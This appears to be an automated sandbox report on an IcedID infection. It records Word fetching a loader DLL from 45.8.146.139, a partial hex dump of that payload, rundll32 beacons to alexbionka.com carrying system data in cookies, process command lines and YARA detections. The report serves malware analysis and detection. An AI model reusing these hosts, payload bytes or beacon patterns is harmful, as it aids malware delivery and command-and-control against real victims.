                                            Aug 11, 2022 17:38:27.320184946 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.320203066 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.320245028 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.320255995 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.320297956 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.320318937 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.320362091 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.320364952 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.320401907 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.320405006 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.320442915 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.320444107 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.320483923 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.320485115 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.320524931 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.643306971 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.643423080 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:32.115506887 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:32.115722895 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:36.246077061 CEST4917480192.168.2.2264.227.108.27
                                            Aug 11, 2022 17:38:36.434330940 CEST804917464.227.108.27192.168.2.22
                                            Aug 11, 2022 17:38:36.434499025 CEST4917480192.168.2.2264.227.108.27
                                            Aug 11, 2022 17:38:36.435995102 CEST4917480192.168.2.2264.227.108.27
                                            Aug 11, 2022 17:38:36.622642040 CEST804917464.227.108.27192.168.2.22
                                            Aug 11, 2022 17:38:37.107072115 CEST804917464.227.108.27192.168.2.22
                                            Aug 11, 2022 17:38:37.313636065 CEST4917480192.168.2.2264.227.108.27
                                            Aug 11, 2022 17:38:38.160131931 CEST4917480192.168.2.2264.227.108.27
                                            Aug 11, 2022 17:39:44.189764023 CEST4917380192.168.2.2245.8.146.139

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Aug 11, 2022 17:38:36.178013086 CEST5586853192.168.2.228.8.8.8
                                            Aug 11, 2022 17:38:36.195198059 CEST53558688.8.8.8192.168.2.22
                                            Aug 11, 2022 17:38:36.213418007 CEST4968853192.168.2.228.8.8.8
                                            Aug 11, 2022 17:38:36.233592987 CEST53496888.8.8.8192.168.2.22

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Aug 11, 2022 17:38:36.178013086 CEST192.168.2.228.8.8.80x26e4Standard query (0)alexbionka.comA (IP address)IN (0x0001)
                                            Aug 11, 2022 17:38:36.213418007 CEST192.168.2.228.8.8.80xa642Standard query (0)alexbionka.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Aug 11, 2022 17:38:36.195198059 CEST8.8.8.8192.168.2.220x26e4No error (0)alexbionka.com64.227.108.27A (IP address)IN (0x0001)
                                            Aug 11, 2022 17:38:36.233592987 CEST8.8.8.8192.168.2.220xa642No error (0)alexbionka.com64.227.108.27A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • 45.8.146.139
                                            • alexbionka.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.224917345.8.146.13980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            TimestampkBytes transferredDirectionData
                                            Aug 11, 2022 17:38:26.663358927 CEST0OUTGET /fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll HTTP/1.1
                                            Accept: */*
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 45.8.146.139
                                            Connection: Keep-Alive
                                            Aug 11, 2022 17:38:26.792161942 CEST2INHTTP/1.1 200 OK
                                            Date: Thu, 11 Aug 2022 15:38:26 GMT
                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                            X-Powered-By: PHP/7.2.34
                                            Content-Description: File Transfer
                                            Content-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n14.dll"
                                            Expires: 0
                                            Cache-Control: must-revalidate
                                            Pragma: public
                                            Content-Length: 360448
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: application/octet-stream
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 ef 34 c3 11 8e 5a 90 11 8e 5a 90 11 8e 5a 90 02 e9 59 91 10 8e 5a 90 59 e0 5a 91 10 8e 5a 90 33 e6 a5 90 10 8e 5a 90 6a e1 58 91 10 8e 5a 90 52 69 63 68 11 8e 5a 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 59 d1 f4 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 0e 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 0a 00 06 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 91 9d 05 00 03 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 05 00 7d 01 00 00 00 00 00 00 00 00 00 00 00 a0 05 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 77 05 00 00 10 00 00 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7d 01 00 00 00 90 05 00 00 02 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 05 00 00 02 00 00 00 7e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U4ZZZYZYZZ3ZjXZRichZPEdYb" x`}.textwx `.rdata}|@@.rsrc~@@
                                            Aug 11, 2022 17:38:26.792212963 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii: H_IIHLD$T$:tHL$Hf;tD$($:tHIHsvIHD$
                                            Aug 11, 2022 17:38:26.792253971 CEST4INData Raw: 00 00 00 ae 00 00 00 c7 84 24 9c 00 00 00 05 00 00 00 e9 60 ff ff ff 81 84 24 84 00 00 00 a2 00 00 00 c7 84 24 88 00 00 00 0c 00 00 00 3a ff 74 00 83 84 24 88 00 00 00 21 c7 84 24 8c 00 00 00 00 00 00 00 66 3b ff 74 00 83 84 24 8c 00 00 00 4c c7
                                            Data Ascii: $`$$:t$!$f;t$L$f:t$$$$f;tD$hD$lf;D$`D$d:t5D$TD$X?f;tD$XD$\f;t#D$PTD$T:tD$dD
                                            Aug 11, 2022 17:38:26.792294025 CEST6INData Raw: 00 00 83 c0 32 3a e4 74 d8 b8 34 00 00 00 83 c0 36 e9 37 03 00 00 b8 57 00 00 00 83 c0 0f 66 3b c9 74 0a 83 c0 44 66 89 44 24 60 eb dc 66 89 44 24 5e b8 29 00 00 00 3a f6 74 e8 b8 34 00 00 00 83 c0 37 66 3b e4 0f 84 7b ff ff ff 48 83 bc 24 a0 01
                                            Data Ascii: 2:t467Wf;tDfD$`fD$^):t47f;{H$t$u3H$_^:L$HT$pf;tH$$9L$pH$h:tH$`T$x$@m$D:t1$L
                                            Aug 11, 2022 17:38:26.792332888 CEST7INData Raw: 00 e9 6c fc ff ff 83 84 24 14 01 00 00 0a c7 84 24 18 01 00 00 25 00 00 00 66 3b ed 0f 84 74 ff ff ff 33 c0 48 81 c4 48 02 00 00 e9 11 fb ff ff 8b 44 24 30 ff c0 e9 96 02 00 00 33 c0 eb e5 48 c7 84 24 98 00 00 00 00 00 00 00 e9 80 00 00 00 48 83
                                            Data Ascii: l$$%f;t3HHD$03H$H$t$uAXA\HAAHHHIV!IH3H|$xu!H$H$uf;t3aD$xHD$pR$
                                            Aug 11, 2022 17:38:26.792371035 CEST8INData Raw: 00 00 66 3b ff 74 00 c7 84 24 d8 00 00 00 16 00 00 00 83 84 24 d8 00 00 00 40 eb b8 c7 84 24 c4 00 00 00 c0 00 00 00 81 84 24 c4 00 00 00 85 00 00 00 3a f6 74 17 c7 84 24 c0 00 00 00 32 03 00 00 83 84 24 c0 00 00 00 03 3a e4 74 cf c7 84 24 c8 00
                                            Data Ascii: f;t$$@$$:t$2$:t$.$f;t$$:f;t/$%$f;t$A$:t$$:Af;t-H$P:tD
                                            Aug 11, 2022 17:38:26.792409897 CEST10INData Raw: 81 84 24 ec 00 00 00 de 00 00 00 3a ff 74 79 c7 84 24 e0 00 00 00 90 02 00 00 83 84 24 e0 00 00 00 6d 3a ed 74 4a c7 84 24 f8 00 00 00 52 00 00 00 83 84 24 f8 00 00 00 04 3a c0 74 17 c7 84 24 f4 00 00 00 02 00 00 00 83 84 24 f4 00 00 00 16 3a e4
                                            Data Ascii: $:ty$$m:tJ$R$:t$$:t$$of;X$$f;t$P$f;t$($f;9D$@0D$@:tYD$`D$`T$D$HD$Ho:tD$
                                            Aug 11, 2022 17:38:26.792449951 CEST11INData Raw: d8 00 00 00 ae 00 00 00 c7 84 24 dc 00 00 00 05 00 00 00 eb 97 83 84 24 c8 00 00 00 21 c7 84 24 cc 00 00 00 00 00 00 00 3a c9 74 00 83 84 24 cc 00 00 00 4c c7 84 24 d0 00 00 00 66 00 00 00 66 3b c9 0f 84 48 ff ff ff 81 84 24 d4 00 00 00 b3 00 00
                                            Data Ascii: $$!$:t$L$ff;H$$:t$$f;d$z$\f;t3HL$8f;tT$hHL$@:t$HL$8T$`:tD$0AHD$@HD$ >u3
                                            Aug 11, 2022 17:38:26.792489052 CEST13INData Raw: 84 24 fc 00 00 00 12 00 00 00 3a c0 74 cf 81 84 24 04 01 00 00 8b 00 00 00 c7 84 24 08 01 00 00 16 00 00 00 e9 52 ff ff ff 83 84 24 e0 00 00 00 2d c7 84 24 e4 00 00 00 41 00 00 00 66 3b c0 0f 84 4e ff ff ff 83 84 24 f0 00 00 00 03 c7 84 24 f4 00
                                            Data Ascii: $:t$$R$-$Af;N$$:K$$:tH&I%HXIIcIIIL#HIH$P$Tf;t$T$X$<
                                            Aug 11, 2022 17:38:26.792529106 CEST14INData Raw: 88 44 24 20 48 8b 44 24 30 66 3b d2 74 3d 41 83 c0 0f 33 d2 3a d2 74 d7 48 8b c1 8a 00 66 3b db 74 de 48 8b 8c 24 88 00 00 00 4c 8b 01 e9 34 fe ff ff 8a 4c 24 21 e8 d6 01 00 00 e9 8a 01 00 00 48 8b c1 8a 40 01 66 3b ff 74 97 48 8b 4c 24 38 48 03
                                            Data Ascii: D$ HD$0f;t=A3:tHf;tH$L4L$!H@f;tHL$8Hf;tkH@`uH|$(rAHD$(HwHxHD$0HD$(IHIHdHD$0HLHI"I_IHfI\IM3M_HAUHA]H
                                            Aug 11, 2022 17:38:26.900171995 CEST16INData Raw: d4 8b 44 24 04 89 44 24 08 eb 35 c3 41 50 41 ff d6 49 81 c3 07 06 00 00 48 25 54 03 00 00 4d 0f a4 f5 59 48 81 e5 a4 11 00 00 49 f7 fb 49 ff c1 53 4c 87 d9 e4 9a c3 49 13 e3 48 f7 f4 4c 03 c1 8b 44 24 08 48 83 c4 18 e9 67 ff ff ff 8b 04 24 89 44
                                            Data Ascii: D$D$5APAIH%TMYHIISLIHLD$Hg$D$Hm"H3HHPHHHIHI6!IIHHM#9D$49D$,}:D$$D$8xgHPHMiIIIMAII


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.224917464.227.108.2780C:\Windows\System32\rundll32.exe
                                            TimestampkBytes transferredDirectionData
                                            Aug 11, 2022 17:38:36.435995102 CEST384OUTGET / HTTP/1.1
                                            Connection: Keep-Alive
                                            Cookie: __gads=3570055661:1:6727:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323834393932:416C627573:31463945303738373942323239343237; __io=0; _gid=67AFEDC5AC03
                                            Host: alexbionka.com
                                            Aug 11, 2022 17:38:37.107072115 CEST384INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 11 Aug 2022 15:38:37 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:1
                                            Start time:17:38:18
                                            Start date:11/08/2022
                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                            Imagebase:0x13f440000
                                            File size:1423704 bytes
                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Target ID:4
                                            Start time:17:38:28
                                            Start date:11/08/2022
                                            Path:C:\Users\user\AppData\Local\Temp\r9093.tmp.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
                                            Imagebase:0x760000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, Metadefender, Browse
                                            • Detection: 0%, ReversingLabs
                                            Reputation:high

                                            General

                                            Target ID:5
                                            Start time:17:38:29
                                            Start date:11/08/2022
                                            Path:C:\Windows\System32\rundll32.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
                                            Imagebase:0xffe40000
                                            File size:45568 bytes
                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Call Graph

                                            • Entrypoint
                                            • Decryption Function
                                            • Executed
                                            • Not Executed
                                            • Show Help
                                            callgraph 1 Error: Graph is empty

                                            Module: __Unknown_Module_Name__

                                            Declaration
                                            LineContent
                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:20.8%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:16.3%
                                              Total number of Nodes:312
                                              Total number of Limit Nodes:7
                                              execution_graph 1505 763e64 _except_handler4_common 1427 763f93 1428 763f82 1427->1428 1428->1427 1430 763b77 1428->1430 1431 763bbe 1430->1431 1432 763bc8 LoadLibraryExA 1431->1432 1443 763be8 1431->1443 1434 763c1e GetLastError 1432->1434 1435 763bd9 InterlockedCompareExchange 1432->1435 1433 763c46 1438 763c82 DelayLoadFailureHook 1433->1438 1441 763c8d 1433->1441 1436 763c2f InterlockedCompareExchange 1434->1436 1437 763c28 1434->1437 1440 763c13 FreeLibrary 1435->1440 1435->1443 1436->1433 1436->1443 1437->1436 1437->1438 1438->1441 1439 763c55 GetProcAddress 1439->1433 1442 763c66 GetLastError 1439->1442 1440->1443 1441->1428 1442->1433 1443->1433 1443->1438 1443->1439 1444 7639d0 1445 7639d2 1444->1445 1451 76398f 1444->1451 1446 7629b3 9 API calls 1445->1446 1447 763a0e GetCurrentProcess IsWow64Process 1446->1447 1448 763b40 1447->1448 1449 763a2c 1447->1449 1454 761189 4 API calls 1448->1454 1449->1448 1450 763a38 GetNativeSystemInfo 1449->1450 1452 763a64 1450->1452 1453 761189 4 API calls 1451->1453 1452->1448 1455 763a88 GetSystemDirectoryW 1452->1455 1456 7639cc 1453->1456 1457 763b54 1454->1457 1455->1448 1458 763aa2 1455->1458 1459 76384e 17 API calls 1458->1459 1460 763ab9 1459->1460 1460->1448 1461 763ac1 Wow64EnableWow64FsRedirection memset GetCommandLineW CreateProcessW 1460->1461 1461->1448 1462 763b12 Wow64EnableWow64FsRedirection WaitForSingleObject CloseHandle CloseHandle 1461->1462 1462->1448 1509 763cef 1510 763d2c 1509->1510 1512 763d01 1509->1512 1511 763d26 ?terminate@ 1511->1510 1512->1510 1512->1511 1139 76178c 1157 761593 1139->1157 1141 761791 1142 76179d GetStartupInfoW 1141->1142 1143 7617ce InterlockedCompareExchange 1142->1143 1144 761903 1143->1144 1145 7617df 1143->1145 1144->1145 1146 761912 Sleep 1144->1146 1147 761922 _amsg_exit 1145->1147 1148 7617ef 1145->1148 1146->1143 1153 76184c 1147->1153 1149 761824 _initterm 1148->1149 1150 76183f 1148->1150 1152 7619aa 1148->1152 1149->1150 1151 761844 InterlockedExchange 1150->1151 1150->1153 1151->1153 1153->1152 1162 761203 HeapSetInformation NtSetInformationProcess lstrlenW LocalAlloc 1153->1162 1158 76255f 1157->1158 1159 7615bc GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 1157->1159 1158->1159 1161 761612 1158->1161 1160 7615fb 1159->1160 1160->1161 1161->1141 1163 761355 ExitProcess 1162->1163 1165 76125b 1162->1165 1164 76134c LocalFree 1164->1163 1165->1164 1189 761622 1165->1189 1168 761296 SetErrorMode 1195 761e56 GetFileAttributesW 1168->1195 1169 7624cd 1251 763955 1169->1251 1176 7621db 1242 76389e LoadStringW 1176->1242 1179 7612e8 1179->1176 1180 76133a LocalFree 1179->1180 1181 7612f7 1179->1181 1237 76138b 1180->1237 1234 761467 RtlImageNtHeader 1181->1234 1186 76130f 1187 761331 FreeLibrary 1186->1187 1188 76132a DestroyWindow 1186->1188 1187->1180 1188->1187 1190 761642 1189->1190 1193 76165b 1190->1193 1259 763fad lstrlenW lstrlenW 1190->1259 1192 761285 1192->1164 1192->1168 1192->1169 1193->1192 1255 761733 1193->1255 1196 76233b SearchPathW 1195->1196 1199 761e93 1195->1199 1197 761ea9 lstrlenW 1196->1197 1205 761fc6 1196->1205 1197->1199 1199->1196 1199->1197 1201 761eee GetFileAttributesW 1199->1201 1202 761f16 CreateActCtxW 1199->1202 1199->1205 1200 7612b1 1209 7619e3 1200->1209 1201->1199 1203 762618 CreateActCtxW 1201->1203 1202->1199 1204 761f3e CreateActCtxW 1202->1204 1203->1199 1204->1205 1206 761f58 CreateActCtxW 1204->1206 1262 761189 1205->1262 1206->1199 1207 761f76 1206->1207 1207->1205 1208 761fa9 CreateActCtxW 1207->1208 1208->1205 1265 761a33 NtOpenProcessToken 1209->1265 1214 762108 NtOpenProcessToken 1215 762121 NtSetInformationToken NtClose 1214->1215 1216 7612ba 1214->1216 1215->1216 1216->1176 1217 761b87 1216->1217 1279 7614bd LoadLibraryExW 1217->1279 1220 761bb6 1293 761c02 1220->1293 1221 761bf5 1221->1179 1224 762494 1226 76389e 8 API calls 1224->1226 1225 761bd3 1227 761be3 1225->1227 1229 762188 lstrlenW WideCharToMultiByte LocalAlloc 1225->1229 1228 7624a7 FreeLibrary 1226->1228 1227->1221 1228->1179 1230 76247f 1229->1230 1231 7621bd WideCharToMultiByte 1229->1231 1232 76389e 8 API calls 1230->1232 1231->1227 1233 76248f 1232->1233 1233->1228 1235 7612ff 1234->1235 1236 7613b9 LoadIconW LoadCursorW RegisterClassW CreateWindowExW 1235->1236 1236->1186 1238 761396 1237->1238 1239 7613b0 1237->1239 1240 7613a7 ReleaseActCtx 1238->1240 1241 76139c DeactivateActCtx 1238->1241 1239->1164 1240->1239 1241->1240 1243 76393f 1242->1243 1244 7638e8 1242->1244 1245 761189 4 API calls 1243->1245 1423 762ccf 1244->1423 1247 76394c 1245->1247 1247->1169 1249 763913 LoadStringW 1249->1243 1250 763927 MessageBoxW 1249->1250 1250->1243 1254 763979 1251->1254 1252 761189 4 API calls 1253 7624dd 1252->1253 1253->1164 1254->1252 1256 76173b 1255->1256 1257 761758 1256->1257 1258 76174f CharNextW 1256->1258 1257->1192 1258->1256 1260 763fd2 CompareStringW 1259->1260 1261 763fea 1259->1261 1260->1261 1261->1190 1263 761195 1262->1263 1264 763e89 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1262->1264 1263->1200 1264->1200 1266 761a55 1265->1266 1267 7619fc 1265->1267 1275 761a8c NtQueryInformationToken 1266->1275 1267->1216 1271 7620b4 1267->1271 1270 761a79 1270->1267 1272 7620cc 1271->1272 1274 761a14 1271->1274 1273 7620d2 QueryActCtxW 1272->1273 1272->1274 1273->1274 1274->1214 1274->1216 1276 761ac2 1275->1276 1277 761a69 NtClose 1275->1277 1276->1277 1278 762362 NtQueryInformationToken 1276->1278 1277->1267 1277->1270 1278->1277 1280 7623fc GetLastError 1279->1280 1281 7614fb RtlImageNtHeader 1279->1281 1282 76240b 1280->1282 1287 762411 1280->1287 1283 761506 1281->1283 1290 761519 1281->1290 1303 7639e5 1282->1303 1286 761511 SetProcessDEPPolicy 1283->1286 1283->1290 1285 762454 FormatMessageW 1288 762462 1285->1288 1285->1290 1286->1290 1287->1285 1287->1290 1291 76389e 8 API calls 1288->1291 1289 761189 4 API calls 1292 76152c 1289->1292 1290->1289 1291->1290 1292->1220 1292->1221 1294 761bc8 1293->1294 1295 761c1a 1293->1295 1294->1224 1294->1225 1296 761c24 lstrlenW LocalAlloc 1295->1296 1298 762396 _wtoi GetProcAddress 1295->1298 1296->1294 1297 761c46 WideCharToMultiByte 1296->1297 1299 761c86 LocalFree 1297->1299 1300 761c5e lstrlenA GetProcAddress 1297->1300 1298->1294 1299->1294 1300->1299 1301 762147 GetProcAddress 1300->1301 1301->1299 1302 762164 GetProcAddress 1301->1302 1302->1299 1304 763a02 1303->1304 1320 7629b3 CreateFileW 1304->1320 1307 763b45 1311 761189 4 API calls 1307->1311 1308 763a2c 1308->1307 1309 763a38 GetNativeSystemInfo 1308->1309 1310 763a64 1309->1310 1310->1307 1312 763a88 GetSystemDirectoryW 1310->1312 1313 763b54 1311->1313 1312->1307 1314 763aa2 1312->1314 1313->1287 1330 76384e 1314->1330 1317 763ac1 Wow64EnableWow64FsRedirection memset GetCommandLineW CreateProcessW 1317->1307 1318 763b12 Wow64EnableWow64FsRedirection WaitForSingleObject CloseHandle CloseHandle 1317->1318 1318->1307 1319 763b40 1318->1319 1319->1307 1321 7629f0 ReadFile 1320->1321 1322 762a4f 1320->1322 1323 762a47 CloseHandle 1321->1323 1324 762a09 1321->1324 1325 761189 4 API calls 1322->1325 1323->1322 1324->1323 1326 762a14 SetFilePointer 1324->1326 1327 762a5e GetCurrentProcess IsWow64Process 1325->1327 1326->1323 1328 762a25 ReadFile 1326->1328 1327->1307 1327->1308 1328->1323 1329 762a3d 1328->1329 1329->1323 1333 76385b 1330->1333 1332 763894 1332->1307 1332->1317 1334 7635ff 1333->1334 1335 763699 1334->1335 1338 763647 1334->1338 1336 761189 4 API calls 1335->1336 1337 763845 1336->1337 1337->1332 1338->1335 1339 763667 1338->1339 1341 763702 